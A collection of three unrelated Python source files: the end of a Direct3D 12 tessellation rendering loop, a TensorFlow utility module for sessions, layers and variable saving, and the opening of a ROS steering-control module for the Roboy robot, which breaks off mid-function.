descriptor_heap_desc = D3D12_DESCRIPTOR_HEAP_DESC(
Type=D3D12_DESCRIPTOR_HEAP_TYPE_RTV,
NumDescriptors=2)
descriptor_heap = device.CreateDescriptorHeap(descriptor_heap_desc)
rtvs = descriptor_heap.cpu((0, 1))
device.CreateRenderTargetView(swap_chain.GetBuffer(0), None, rtvs[0])
device.CreateRenderTargetView(swap_chain.GetBuffer(1), None, rtvs[1])
mesh = Mesh(device)
mesh.set_index_buffer(bytearray(numpy.array(
[
0, 1, 2, 3
], dtype=numpy.uint16)))
mesh.set_vertex_buffer(bytearray(numpy.array(
[
0, 0, 0,
0, 0, math.pi/2,
0, 0, math.pi,
0, 0, math.pi * 1.5
], dtype=numpy.float32)))
mesh.set_nvertices(4)
rasterizer = Rasterizer(device)
running = True
fps = 0
message_queue = Queue()
tessellation_config = ResourceBuffer(
device, struct.pack('I', 1)) # default to 1
def render_loop():
theta = 0
forward = 0
fence = device.CreateFence()
fence_event = Event()
fence_value = fence.GetCompletedValue()
fence_value += 1
frame_counter = 0
counter = 0
frequency = QueryPerformanceFrequency()
now = QueryPerformanceCounter()
while running:
theta += 0.05
forward = -2 # 10.01
scale = matrix44.create_from_scale((1, 1, 1), dtype='float32')
rotation = matrix44.create_from_y_rotation(theta, dtype='float32')
translation = matrix44.create_from_translation(
(0, 0, forward), dtype='float32')
perspective = matrix44.create_perspective_projection(
60., 1., 0.1, 1000., dtype='float32')
#mesh.matrix = scale @ rotation @ translation @ perspective
mesh.matrix = scale @ rotation @ translation @ perspective
back_buffer_index = swap_chain.GetCurrentBackBufferIndex()
back_buffer = swap_chain.GetBuffer(back_buffer_index)
rasterizer.execute(queue, back_buffer,
rtvs[back_buffer_index], [mesh], tessellation_config)
queue.Signal(fence, fence_value)
if fence.GetCompletedValue() < fence_value:
fence.SetEventOnCompletion(fence_value, fence_event)
fence_event.wait()
fence_value += 1
swap_chain.Present(1)
new_now = QueryPerformanceCounter()
counter += new_now - now
now = new_now
if counter >= frequency:
counter -= frequency
fps = frame_counter
message_queue.put(str(fps))
frame_counter = 1
else:
frame_counter += 1
t = threading.Thread(target=render_loop)
t.start()
while running:
for message, wparam, lparam in window.dequeue():
if message in (WM_QUIT, WM_CLOSE):
running = False
elif message == WM_KEYUP:
if ord('1') <= wparam <= ord('9'):
tessellation_config.resource.upload(struct.pack('I', wparam - ord('0')))
if not message_queue.empty():
new_title = message_queue.get_nowait()
window.set_title(new_title)
running = False
t.join()
print('END')
|
tf_util.py
|
import joblib
import numpy as np
import tensorflow as tf # pylint: ignore-module
import copy
import os
import functools
import collections
import multiprocessing
def switch(condition, then_expression, else_expression):
"""Switches between two operations depending on a scalar value (int or bool).
Note that both `then_expression` and `else_expression`
should be symbolic tensors of the *same shape*.
# Arguments
condition: scalar tensor.
then_expression: TensorFlow operation.
else_expression: TensorFlow operation.
"""
x_shape = copy.copy(then_expression.get_shape())
x = tf.cond(tf.cast(condition, 'bool'),
lambda: then_expression,
lambda: else_expression)
x.set_shape(x_shape)
return x
# ================================================================
# Extras
# ================================================================
def lrelu(x, leak=0.2):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * x + f2 * abs(x)
# ================================================================
# Mathematical utils
# ================================================================
def huber_loss(x, delta=1.0):
"""Reference: https://en.wikipedia.org/wiki/Huber_loss"""
return tf.where(
tf.abs(x) < delta,
tf.square(x) * 0.5,
delta * (tf.abs(x) - 0.5 * delta)
)
# ================================================================
# Global session
# ================================================================
def get_session(config=None):
"""Get default session or create one with a given config"""
sess = tf.get_default_session()
if sess is None:
sess = make_session(config=config, make_default=True)
return sess
def make_session(config=None, num_cpu=None, make_default=False, graph=None):
"""Returns a session that will use <num_cpu> CPU's only"""
if num_cpu is None:
num_cpu = int(os.getenv('RCALL_NUM_CPU', multiprocessing.cpu_count()))
if config is None:
config = tf.ConfigProto(
allow_soft_placement=True,
inter_op_parallelism_threads=num_cpu,
intra_op_parallelism_threads=num_cpu)
config.gpu_options.allow_growth = True
if make_default:
return tf.InteractiveSession(config=config, graph=graph)
else:
return tf.Session(config=config, graph=graph)
def single_threaded_session():
"""Returns a session which will only use a single CPU"""
return make_session(num_cpu=1)
def in_session(f):
@functools.wraps(f)
def newfunc(*args, **kwargs):
with tf.Session():
f(*args, **kwargs)
return newfunc
ALREADY_INITIALIZED = set()
def initialize():
"""Initialize all the uninitialized variables in the global scope."""
new_variables = set(tf.global_variables()) - ALREADY_INITIALIZED
get_session().run(tf.variables_initializer(new_variables))
ALREADY_INITIALIZED.update(new_variables)
# ================================================================
# Model components
# ================================================================
def normc_initializer(std=1.0, axis=0):
def _initializer(shape, dtype=None, partition_info=None): # pylint: disable=W0613
out = np.random.randn(*shape).astype(dtype.as_numpy_dtype)
out *= std / np.sqrt(np.square(out).sum(axis=axis, keepdims=True))
return tf.constant(out)
return _initializer
def conv2d(x, num_filters, name, filter_size=(3, 3), stride=(1, 1), pad="SAME", dtype=tf.float32, collections=None,
summary_tag=None):
with tf.variable_scope(name):
stride_shape = [1, stride[0], stride[1], 1]
filter_shape = [filter_size[0], filter_size[1], int(x.get_shape()[3]), num_filters]
# there are "num input feature maps * filter height * filter width"
# inputs to each hidden unit
fan_in = intprod(filter_shape[:3])
# each unit in the lower layer receives a gradient from:
# "num output feature maps * filter height * filter width" /
# pooling size
fan_out = intprod(filter_shape[:2]) * num_filters
# initialize weights with random weights
w_bound = np.sqrt(6. / (fan_in + fan_out))
w = tf.get_variable("W", filter_shape, dtype, tf.random_uniform_initializer(-w_bound, w_bound),
collections=collections)
b = tf.get_variable("b", [1, 1, 1, num_filters], initializer=tf.zeros_initializer(),
collections=collections)
if summary_tag is not None:
tf.summary.image(summary_tag,
tf.transpose(tf.reshape(w, [filter_size[0], filter_size[1], -1, 1]),
[2, 0, 1, 3]),
max_images=10)
return tf.nn.conv2d(x, w, stride_shape, pad) + b
# ================================================================
# Theano-like Function
# ================================================================
def function(inputs, outputs, updates=None, givens=None):
"""Just like Theano function. Take a bunch of tensorflow placeholders and expressions
computed based on those placeholders and produces f(inputs) -> outputs. Function f takes
values to be fed to the input's placeholders and produces the values of the expressions
in outputs.
Input values can be passed in the same order as inputs or can be provided as kwargs based
on placeholder name (passed to constructor or accessible via placeholder.op.name).
Example:
x = tf.placeholder(tf.int32, (), name="x")
y = tf.placeholder(tf.int32, (), name="y")
z = 3 * x + 2 * y
lin = function([x, y], z, givens={y: 0})
with single_threaded_session():
initialize()
assert lin(2) == 6
assert lin(x=3) == 9
assert lin(2, 2) == 10
assert lin(x=2, y=3) == 12
Parameters
----------
inputs: [tf.placeholder, tf.constant, or object with make_feed_dict method]
list of input arguments
outputs: [tf.Variable] or tf.Variable
list of outputs or a single output to be returned from function. Returned
value will also have the same shape.
updates: [tf.Operation] or tf.Operation
list of update functions or single update function that will be run whenever
the function is called. The return is ignored.
"""
if isinstance(outputs, list):
return _Function(inputs, outputs, updates, givens=givens)
elif isinstance(outputs, (dict, collections.OrderedDict)):
f = _Function(inputs, outputs.values(), updates, givens=givens)
return lambda *args, **kwargs: type(outputs)(zip(outputs.keys(), f(*args, **kwargs)))
else:
f = _Function(inputs, [outputs], updates, givens=givens)
return lambda *args, **kwargs: f(*args, **kwargs)[0]
class _Function(object):
def __init__(self, inputs, outputs, updates, givens):
for inpt in inputs:
if not hasattr(inpt, 'make_feed_dict') and not (type(inpt) is tf.Tensor and len(inpt.op.inputs) == 0):
assert False, "inputs should all be placeholders, constants, or have a make_feed_dict method"
self.inputs = inputs
self.input_names = {inp.name.split("/")[-1].split(":")[0]: inp for inp in inputs}
updates = updates or []
self.update_group = tf.group(*updates)
self.outputs_update = list(outputs) + [self.update_group]
self.givens = {} if givens is None else givens
def _feed_input(self, feed_dict, inpt, value):
if hasattr(inpt, 'make_feed_dict'):
feed_dict.update(inpt.make_feed_dict(value))
else:
feed_dict[inpt] = adjust_shape(inpt, value)
def __call__(self, *args, **kwargs):
assert len(args) + len(kwargs) <= len(self.inputs), "Too many arguments provided"
feed_dict = {}
# Update feed dict with givens.
for inpt in self.givens:
feed_dict[inpt] = adjust_shape(inpt, feed_dict.get(inpt, self.givens[inpt]))
# Update the args
for inpt, value in zip(self.inputs, args):
self._feed_input(feed_dict, inpt, value)
for inpt_name, value in kwargs.items():
self._feed_input(feed_dict, self.input_names[inpt_name], value)
results = get_session().run(self.outputs_update, feed_dict=feed_dict)[:-1]
return results
# ================================================================
# Flat vectors
# ================================================================
def var_shape(x):
out = x.get_shape().as_list()
assert all(isinstance(a, int) for a in out), \
"shape function assumes that shape is fully known"
return out
def numel(x):
return intprod(var_shape(x))
def intprod(x):
return int(np.prod(x))
def flatgrad(loss, var_list, clip_norm=None):
grads = tf.gradients(loss, var_list)
if clip_norm is not None:
grads = [tf.clip_by_norm(grad, clip_norm=clip_norm) for grad in grads]
return tf.concat(axis=0, values=[
tf.reshape(grad if grad is not None else tf.zeros_like(v), [numel(v)])
for (v, grad) in zip(var_list, grads)
])
class SetFromFlat(object):
def __init__(self, var_list, dtype=tf.float32):
assigns = []
shapes = list(map(var_shape, var_list))
total_size = np.sum([intprod(shape) for shape in shapes])
self.theta = theta = tf.placeholder(dtype, [total_size])
start = 0
assigns = []
for (shape, v) in zip(shapes, var_list):
size = intprod(shape)
assigns.append(tf.assign(v, tf.reshape(theta[start:start + size], shape)))
start += size
self.op = tf.group(*assigns)
def __call__(self, theta):
tf.get_default_session().run(self.op, feed_dict={self.theta: theta})
class GetFlat(object):
def __init__(self, var_list):
self.op = tf.concat(axis=0, values=[tf.reshape(v, [numel(v)]) for v in var_list])
def __call__(self):
return tf.get_default_session().run(self.op)
def flattenallbut0(x):
return tf.reshape(x, [-1, intprod(x.get_shape().as_list()[1:])])
# =============================================================
# TF placeholders management
# ============================================================
_PLACEHOLDER_CACHE = {} # name -> (placeholder, dtype, shape)
def get_placeholder(name, dtype, shape):
if name in _PLACEHOLDER_CACHE:
out, dtype1, shape1 = _PLACEHOLDER_CACHE[name]
if out.graph == tf.get_default_graph():
assert dtype1 == dtype and shape1 == shape, \
'Placeholder with name {} has already been registered and has shape {}, different from requested {}'.format(name, shape1, shape)
return out
out = tf.placeholder(dtype=dtype, shape=shape, name=name)
_PLACEHOLDER_CACHE[name] = (out, dtype, shape)
return out
def get_placeholder_cached(name):
return _PLACEHOLDER_CACHE[name][0]
# ================================================================
# Diagnostics
# ================================================================
def display_var_info(vars):
from baselines import logger
count_params = 0
for v in vars:
name = v.name
if "/Adam" in name or "beta1_power" in name or "beta2_power" in name: continue
v_params = np.prod(v.shape.as_list())
count_params += v_params
if "/b:" in name or "/bias" in name: continue # Wx+b, bias is not interesting to look at => count params, but not print
logger.info(" %s%s %i params %s" % (name, " "*(55-len(name)), v_params, str(v.shape)))
logger.info("Total model parameters: %0.2f million" % (count_params*1e-6))
def get_available_gpus():
# recipe from here:
# https://stackoverflow.com/questions/38559755/how-to-get-current-available-gpus-in-tensorflow?utm_medium=organic&utm_source=google_rich_qa&utm_campaign=google_rich_qa
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
return [x.name for x in local_device_protos if x.device_type == 'GPU']
# ================================================================
# Saving variables
# ================================================================
def load_state(fname, sess=None):
from baselines import logger
logger.warn('load_state method is deprecated, please use load_variables instead')
sess = sess or get_session()
saver = tf.train.Saver()
saver.restore(tf.get_default_session(), fname)
def save_state(fname, sess=None):
from baselines import logger
logger.warn('save_state method is deprecated, please use save_variables instead')
sess = sess or get_session()
dirname = os.path.dirname(fname)
if any(dirname):
os.makedirs(dirname, exist_ok=True)
saver = tf.train.Saver()
saver.save(tf.get_default_session(), fname)
# The methods above and below are clearly doing the same thing, and in a rather similar way
# TODO: ensure there is no subtle differences and remove one
def save_variables(save_path, variables=None, sess=None):
sess = sess or get_session()
variables = variables or tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)
ps = sess.run(variables)
save_dict = {v.name: value for v, value in zip(variables, ps)}
dirname = os.path.dirname(save_path)
if any(dirname):
os.makedirs(dirname, exist_ok=True)
joblib.dump(save_dict, save_path)
def load_variables(load_path, variables=None, sess=None):
sess = sess or get_session()
variables = variables or tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)
loaded_params = joblib.load(os.path.expanduser(load_path))
restores = []
if isinstance(loaded_params, list):
assert len(loaded_params) == len(variables), 'number of variables loaded mismatches len(variables)'
for d, v in zip(loaded_params, variables):
restores.append(v.assign(d))
else:
for v in variables:
if v.name.startswith('ddpg'):
restores.append(v.assign(loaded_params[v.name]))
sess.run(restores)
# ================================================================
# Shape adjustment for feeding into tf placeholders
# ================================================================
def adjust_shape(placeholder, data):
'''
adjust shape of the data to the shape of the placeholder if possible.
If shape is incompatible, AssertionError is thrown
Parameters:
placeholder tensorflow input placeholder
data input data to be (potentially) reshaped to be fed into placeholder
Returns:
reshaped data
'''
if not isinstance(data, np.ndarray) and not isinstance(data, list):
return data
if isinstance(data, list):
data = np.array(data)
placeholder_shape = [x or -1 for x in placeholder.shape.as_list()]
assert _check_shape(placeholder_shape, data.shape), \
'Shape of data {} is not compatible with shape of the placeholder {}'.format(data.shape, placeholder_shape)
return np.reshape(data, placeholder_shape)
def _check_shape(placeholder_shape, data_shape):
''' check if two shapes are compatible (i.e. differ only by dimensions of size 1, or by the batch dimension)'''
return True
squeezed_placeholder_shape = _squeeze_shape(placeholder_shape)
squeezed_data_shape = _squeeze_shape(data_shape)
for i, s_data in enumerate(squeezed_data_shape):
s_placeholder = squeezed_placeholder_shape[i]
if s_placeholder != -1 and s_data != s_placeholder:
return False
return True
def _squeeze_shape(shape):
return [x for x in shape if x != 1]
# ================================================================
# Tensorboard interfacing
# ================================================================
def launch_tensorboard_in_background(log_dir):
'''
To log the Tensorflow graph when using rl-algs
algorithms, you can run the following code
in your main script:
import threading, time
def start_tensorboard(session):
time.sleep(10) # Wait until graph is setup
tb_path = osp.join(logger.get_dir(), 'tb')
summary_writer = tf.summary.FileWriter(tb_path, graph=session.graph)
summary_op = tf.summary.merge_all()
launch_tensorboard_in_background(tb_path)
session = tf.get_default_session()
t = threading.Thread(target=start_tensorboard, args=([session]))
t.start()
'''
import subprocess
subprocess.Popen(['tensorboard', '--logdir', log_dir])
|
steering_simulation_old_hand.py
|
## @package steering
# Documentation for this module.
#
# Control of Roboys' shoulders, elbows and wrists for steering.
# In order to reach the requested steering-angle we target intermediate points
# between the current and the requested steering-angle to ensure Roboys' hands
# are following the captured steering-trajectory.
#
# In order to target a point on the steering-trajectory for the hands,
# we use an interpolation-function for the joint angles with steering-angle as input
# that uses precomputed set-points of all joint-angles
# according to a certain steering-angle.
from __future__ import print_function
import json
import time
from threading import Thread
import numpy as np
import numpy.polynomial.polynomial as poly
import rospy
from roboy_control_msgs.srv import SetControllerParameters
from roboy_simulation_msgs.msg import JointState
from scipy import interpolate
from std_msgs.msg import Float32, String, Float64
PRINT_DEBUG = True
RECORDED_TRAJECTORY_FILENAME = "trajectory_steering/steering_trajectory.json"
JOINT_TARGET_ERROR_TOLERANCE = 0.01
UPDATE_FREQUENCY = 0.001
MAX_ANGLE_CHANGE = np.pi / 72
STEP_TRANSITION_TIME = 2.5
JOINT_SHOULDER_AXIS0_RIGHT = "right_shoulder_axis0"
JOINT_SHOULDER_AXIS1_RIGHT = "right_shoulder_axis1"
JOINT_SHOULDER_AXIS2_RIGHT = "right_shoulder_axis2"
JOINT_SHOULDER_AXIS0_LEFT = "left_shoulder_axis0"
JOINT_SHOULDER_AXIS1_LEFT = "left_shoulder_axis1"
JOINT_SHOULDER_AXIS2_LEFT = "left_shoulder_axis2"
JOINT_ELBOW_ROT0_RIGHT = "elbow_right_rot0"
JOINT_ELBOW_ROT1_RIGHT = "elbow_right_rot1"
JOINT_ELBOW_ROT0_LEFT = "elbow_left_rot0"
JOINT_ELBOW_ROT1_LEFT = "elbow_left_rot1"
JOINT_WRIST_0_RIGHT = "right_wrist_0"
JOINT_WRIST_1_RIGHT = "right_wrist_1"
JOINT_WRIST_0_LEFT = "left_wrist_0"
JOINT_WRIST_1_LEFT = "left_wrist_1"
JOINT_BIKE_FRONT = "joint_front"
_joints_list = [JOINT_SHOULDER_AXIS0_RIGHT, JOINT_SHOULDER_AXIS1_RIGHT, JOINT_SHOULDER_AXIS2_RIGHT,
JOINT_SHOULDER_AXIS0_LEFT, JOINT_SHOULDER_AXIS1_LEFT, JOINT_SHOULDER_AXIS2_LEFT,
JOINT_ELBOW_ROT0_RIGHT, JOINT_ELBOW_ROT1_RIGHT, JOINT_ELBOW_ROT0_LEFT, JOINT_ELBOW_ROT1_LEFT,
JOINT_WRIST_0_RIGHT, JOINT_WRIST_1_RIGHT, JOINT_WRIST_0_LEFT, JOINT_WRIST_1_LEFT, JOINT_BIKE_FRONT]
_numTrajectoryPoints = 0
_trajectorySteering = []
_trajectoryShoulder0Right = []
_trajectoryShoulder1Right = []
_trajectoryShoulder2Right = []
_trajectoryShoulder0Left = []
_trajectoryShoulder1Left = []
_trajectoryShoulder2Left = []
_trajectoryElbow0Right = []
_trajectoryElbow1Right = []
_trajectoryElbow0Left = []
_trajectoryElbow1Left = []
_trajectoryWrist0Right = []
_trajectoryWrist1Right = []
_trajectoryWrist0Left = []
_trajectoryWrist1Left = []
_interpolatedShoulder0Right = None
_interpolatedShoulder1Right = None
_interpolatedShoulder2Right = None
_interpolatedShoulder0Left = None
_interpolatedShoulder1Left = None
_interpolatedShoulder2Left = None
_interpolatedElbow0Right = None
_interpolatedElbow1Right = None
_interpolatedElbow0Left = None
_interpolatedElbow1Left = None
_interpolatedWrist0Right = None
_interpolatedWrist1Right = None
_interpolatedWrist0Left = None
_interpolatedWrist1Left = None
_regressedShoulder0Right = None
_regressedShoulder1Right = None
_regressedShoulder2Right = None
_regressedShoulder0Left = None
_regressedShoulder1Left = None
_regressedShoulder2Left = None
_regressedElbow0Right = None
_regressedElbow1Right = None
_regressedElbow0Left = None
_regressedElbow1Left = None
_regressedWrist0Right = None
_regressedWrist1Right = None
_regressedWrist0Left = None
_regressedWrist1Left = None
_jointsStatusData = {
JOINT_SHOULDER_AXIS0_RIGHT: {
"Pos": 0.0,
"Vel": 0.0
},
JOINT_SHOULDER_AXIS1_RIGHT: {
"Pos": 0.0,
"Vel": 0.0
},
JOINT_SHOULDER_AXIS2_RIGHT: {
"Pos": 0.0,
"Vel": 0.0
},
JOINT_SHOULDER_AXIS0_LEFT: {
"Pos": 0.0,
"Vel": 0.0
},
JOINT_SHOULDER_AXIS1_LEFT: {
"Pos": 0.0,
"Vel": 0.0
},
JOINT_SHOULDER_AXIS2_LEFT: {
"Pos": 0.0,
"Vel": 0.0
},
JOINT_ELBOW_ROT0_RIGHT: {
"Pos": 0.0,
"Vel": 0.0
},
JOINT_ELBOW_ROT1_RIGHT: {
"Pos": 0.0,
"Vel": 0.0
},
JOINT_ELBOW_ROT0_LEFT: {
"Pos": 0.0,
"Vel": 0.0
},
JOINT_ELBOW_ROT1_LEFT: {
"Pos": 0.0,
"Vel": 0.0
},
JOINT_WRIST_0_RIGHT: {
"Pos": 0.0,
"Vel": 0.0
},
JOINT_WRIST_1_RIGHT: {
"Pos": 0.0,
"Vel": 0.0
},
JOINT_WRIST_0_LEFT: {
"Pos": 0.0,
"Vel": 0.0
},
JOINT_WRIST_1_LEFT: {
"Pos": 0.0,
"Vel": 0.0
}
}
ros_right_shoulder_axis0_pub = rospy.Publisher('/right_shoulder_axis0/right_shoulder_axis0/target', Float32,
queue_size=2)
ros_right_shoulder_axis1_pub = rospy.Publisher('/right_shoulder_axis1/right_shoulder_axis1/target', Float32,
queue_size=2)
ros_right_shoulder_axis2_pub = rospy.Publisher('/right_shoulder_axis2/right_shoulder_axis2/target', Float32,
queue_size=2)
ros_left_shoulder_axis0_pub = rospy.Publisher('/left_shoulder_axis0/left_shoulder_axis0/target', Float32, queue_size=2)
ros_left_shoulder_axis1_pub = rospy.Publisher('/left_shoulder_axis1/left_shoulder_axis1/target', Float32, queue_size=2)
ros_left_shoulder_axis2_pub = rospy.Publisher('/left_shoulder_axis2/left_shoulder_axis2/target', Float32, queue_size=2)
ros_elbow_right_rot0_pub = rospy.Publisher('/elbow_right_rot0/elbow_right_rot0/target', Float32, queue_size=2)
ros_elbow_right_rot1_pub = rospy.Publisher('/elbow_right_rot1/elbow_right_rot1/target', Float32, queue_size=2)
ros_elbow_left_rot0_pub = rospy.Publisher('/elbow_left_rot0/elbow_left_rot0/target', Float32, queue_size=2)
ros_elbow_left_rot1_pub = rospy.Publisher('/elbow_left_rot1/elbow_left_rot1/target', Float32, queue_size=2)
ros_right_wrist_0_pub = rospy.Publisher('/right_wrist_0/right_wrist_0/target', Float32, queue_size=2)
ros_right_wrist_1_pub = rospy.Publisher('/right_wrist_1/right_wrist_1/target', Float32, queue_size=2)
ros_left_wrist_0_pub = rospy.Publisher('/left_wrist_0/left_wrist_0/target', Float32, queue_size=2)
ros_left_wrist_1_pub = rospy.Publisher('/left_wrist_1/left_wrist_1/target', Float32, queue_size=2)
ros_bike_front_pub = rospy.Publisher('/joint_front/joint_front/target', Float32, queue_size=2)
ros_log_error_pub = rospy.Publisher('chatter', String, queue_size=10)
requested_steering_angle = 0
angle_change_successful = True
## Documentation for a function.
#
# This function collects the current status of the joint-angles and saves
# them in the global dictionary "_jointStatusData".
def joint_state_callback(joint_data):
global _jointsStatusData
# Assert order of joints
for stringIter in range(len(joint_data.names)):
if joint_data.names[stringIter] in _jointsStatusData:
_jointsStatusData[joint_data.names[stringIter]]["Pos"] = joint_data.q[stringIter]
_jointsStatusData[joint_data.names[stringIter]]["Vel"] = joint_data.qd[stringIter]
## Documentation for a function.
#
# Returns current position of joint-angle @jointName. .
def get_joint_position(joint_name):
global _jointsStatusData
return _jointsStatusData[joint_name ][ "Pos" ]
## Documentation for a function.
#
# Initializes the interpolation-functions for every joint-angle using regression.
# The input value of the function is a steering angle and the output value of the function
# is the correspondent joint angle.
#
# The functions can be used by calling "<function_name>(<steering_angle>)"
# ==> returns <joint_angle>
def regress_joint_positions_from_file(filename):
global _trajectorySteering
global _trajectoryShoulder0Right
global _trajectoryShoulder1Right
global _trajectoryShoulder2Right
global _trajectoryShoulder0Left
global _trajectoryShoulder1Left
global _trajectoryShoulder2Left
global _trajectoryElbow0Right
global _trajectoryElbow1Right
global _trajectoryElbow0Left
global _trajectoryElbow1Left
global _trajectoryWrist0Right
global _trajectoryWrist1Right
global _trajectoryWrist0Left
global _trajectoryWrist1Left
global _regressedShoulder0Right
global _regressedShoulder1Right
global _regressedShoulder2Right
global _regressedShoulder0Left
global _regressedShoulder1Left
global _regressedShoulder2Left
global _regressedElbow0Right
global _regressedElbow1Right
global _regressedElbow0Left
global _regressedElbow1Left
global _regressedWrist0Right
global _regressedWrist1Right
global _regressedWrist0Left
global _regressedWrist1Left
loaded_data = None
with open(filename, "r") as read_file:
loaded_data = json.load(read_file)
_regressedShoulder0Right = poly.Polynomial(loaded_data[JOINT_SHOULDER_AXIS0_RIGHT])
_regressedShoulder1Right = poly.Polynomial(loaded_data[JOINT_SHOULDER_AXIS1_RIGHT])
_regressedShoulder2Right = poly.Polynomial(loaded_data[JOINT_SHOULDER_AXIS2_RIGHT])
_regressedElbow0Right = poly.Polynomial(loaded_data[JOINT_ELBOW_ROT0_RIGHT])
_regressedElbow1Right = poly.Polynomial(loaded_data[JOINT_ELBOW_ROT1_RIGHT])
_regressedWrist0Right = poly.Polynomial(loaded_data[JOINT_WRIST_0_RIGHT])
_regressedWrist1Right = poly.Polynomial(loaded_data[JOINT_WRIST_1_RIGHT])
_regressedShoulder0Left = poly.Polynomial(loaded_data[JOINT_SHOULDER_AXIS0_LEFT])
_regressedShoulder1Left = poly.Polynomial(loaded_data[JOINT_SHOULDER_AXIS1_LEFT])
_regressedShoulder2Left = poly.Polynomial(loaded_data[JOINT_SHOULDER_AXIS2_LEFT])
_regressedElbow0Left = poly.Polynomial(loaded_data[JOINT_ELBOW_ROT0_LEFT])
_regressedElbow1Left = poly.Polynomial(loaded_data[JOINT_ELBOW_ROT1_LEFT])
_regressedWrist0Left = poly.Polynomial(loaded_data[JOINT_WRIST_0_LEFT])
_regressedWrist1Left = poly.Polynomial(loaded_data[JOINT_WRIST_1_LEFT])
return 1
## Documentation for a function.
#
# Collects and saves all joint- and steering-angles from the pre-captured
# trajectory from the @read_file (global variable).
def import_joint_trajectory_record():
global _trajectorySteering
global _trajectoryShoulder0Right
global _trajectoryShoulder1Right
global _trajectoryShoulder2Right
global _trajectoryShoulder0Left
global _trajectoryShoulder1Left
global _trajectoryShoulder2Left
global _trajectoryElbow0Right
global _trajectoryElbow1Right
global _trajectoryElbow0Left
global _trajectoryElbow1Left
global _trajectoryWrist0Right
global _trajectoryWrist1Right
global _trajectoryWrist0Left
global _trajectoryWrist1Left
global PRINT_DEBUG
with open(RECORDED_TRAJECTORY_FILENAME, "r") as read_file:
loaded_data = json.load(read_file)
if loaded_data["num_points"] is None:
return 0
else:
_numTrajectoryPoints = loaded_data["num_points"]
for pointIterator in range(_numTrajectoryPoints):
if "point_" + str(pointIterator) in loaded_data:
_trajectorySteering.append(loaded_data["point_" + str(pointIterator)]["Right"]["Steering_angle"])
_trajectoryShoulder0Right.append(
loaded_data["point_" + str(pointIterator)]["Right"][JOINT_SHOULDER_AXIS0_RIGHT])
_trajectoryShoulder1Right.append(
loaded_data["point_" + str(pointIterator)]["Right"][JOINT_SHOULDER_AXIS1_RIGHT])
_trajectoryShoulder2Right.append(
loaded_data["point_" + str(pointIterator)]["Right"][JOINT_SHOULDER_AXIS2_RIGHT])
_trajectoryElbow0Right.append(
loaded_data["point_" + str(pointIterator)]["Right"][JOINT_ELBOW_ROT0_RIGHT])
_trajectoryElbow1Right.append(
loaded_data["point_" + str(pointIterator)]["Right"][JOINT_ELBOW_ROT1_RIGHT])
_trajectoryWrist0Right.append(
loaded_data["point_" + str(pointIterator)]["Right"][JOINT_WRIST_0_RIGHT])
_trajectoryWrist1Right.append(
loaded_data["point_" + str(pointIterator)]["Right"][JOINT_WRIST_1_RIGHT])
_trajectoryShoulder0Left.append(
loaded_data["point_" + str(pointIterator)]["Left"][JOINT_SHOULDER_AXIS0_LEFT])
_trajectoryShoulder1Left.append(
loaded_data["point_" + str(pointIterator)]["Left"][JOINT_SHOULDER_AXIS1_LEFT])
_trajectoryShoulder2Left.append(
loaded_data["point_" + str(pointIterator)]["Left"][JOINT_SHOULDER_AXIS2_LEFT])
_trajectoryElbow0Left.append(
loaded_data["point_" + str(pointIterator)]["Left"][JOINT_ELBOW_ROT0_LEFT])
_trajectoryElbow1Left.append(
loaded_data["point_" + str(pointIterator)]["Left"][JOINT_ELBOW_ROT1_LEFT])
_trajectoryWrist0Left.append(loaded_data["point_" + str(pointIterator)]["Left"][JOINT_WRIST_0_LEFT])
_trajectoryWrist1Left.append(loaded_data["point_" + str(pointIterator)]["Left"][JOINT_WRIST_1_LEFT])
else:
print("WARNING: No point_%s in trajectory" % pointIterator)
_numTrajectoryPoints -= 1
if PRINT_DEBUG:
print("--------- Num trajectory points:")
print(_numTrajectoryPoints)
print("max_angle = ", max(_trajectorySteering))
print("min_angle = ", min(_trajectorySteering))
## Documentation for a function.
#
# Initializes the interpolation-functions for every joint-angle using
# cubic spline interpolation.
# The input value of the function is a steering angle and the output value of the function
# the correspondent joint angle.
#
# The functions can be used by calling "<function_name>(<steering_angle>)"
# ==> returns <joint_angle>
def interpolate_joint_angles():
global _interpolatedShoulder0Right
global _interpolatedShoulder1Right
global _interpolatedShoulder2Right
global _interpolatedShoulder0Left
global _interpolatedShoulder1Left
global _interpolatedShoulder2Left
global _interpolatedElbow0Right
global _interpolatedElbow1Right
global _interpolatedElbow0Left
global _interpolatedElbow1Left
global _interpolatedWrist0Right
global _interpolatedWrist1Right
global _interpolatedWrist0Left
global _interpolatedWrist1Left
_interpolatedShoulder0Right = interpolate.interp1d(_trajectorySteering, _trajectoryShoulder0Right, kind="cubic")
_interpolatedShoulder1Right = interpolate.interp1d(_trajectorySteering, _trajectoryShoulder1Right, kind="cubic")
_interpolatedShoulder2Right = interpolate.interp1d(_trajectorySteering, _trajectoryShoulder2Right, kind="cubic")
_interpolatedElbow0Right = interpolate.interp1d(_trajectorySteering, _trajectoryElbow0Right, kind="cubic")
_interpolatedElbow1Right = interpolate.interp1d(_trajectorySteering, _trajectoryElbow1Right, kind="cubic")
_interpolatedWrist0Right = interpolate.interp1d(_trajectorySteering, _trajectoryWrist0Right, kind="cubic")
_interpolatedWrist1Right = interpolate.interp1d(_trajectorySteering, _trajectoryWrist1Right, kind="cubic")
_interpolatedShoulder0Left = interpolate.interp1d(_trajectorySteering, _trajectoryShoulder0Left, kind="cubic")
_interpolatedShoulder1Left = interpolate.interp1d(_trajectorySteering, _trajectoryShoulder1Left, kind="cubic")
_interpolatedShoulder2Left = interpolate.interp1d(_trajectorySteering, _trajectoryShoulder2Left, kind="cubic")
_interpolatedElbow0Left = interpolate.interp1d(_trajectorySteering, _trajectoryElbow0Left, kind="cubic")
_interpolatedElbow1Left = interpolate.interp1d(_trajectorySteering, _trajectoryElbow1Left, kind="cubic")
_interpolatedWrist0Left = interpolate.interp1d(_trajectorySteering, _trajectoryWrist0Left, kind="cubic")
_interpolatedWrist1Left = interpolate.interp1d(_trajectorySteering, _trajectoryWrist1Left, kind="cubic")
## Documentation for a function
#
# Returns the absolute difference of two angles within the interval [0;2pi]
def get_angle_difference(angle_1, angle_2):
return np.pi - np.abs(np.abs(angle_1 - angle_2) - np.pi)
## Documentation for a function
#
# Sets Kp of joint-controller to @proportional_value
# Sets Kd of joint-controller to @derivative_value
def set_joint_controller_parameters(proportional_value, derivative_value):
for thisJointName in _joints_list:
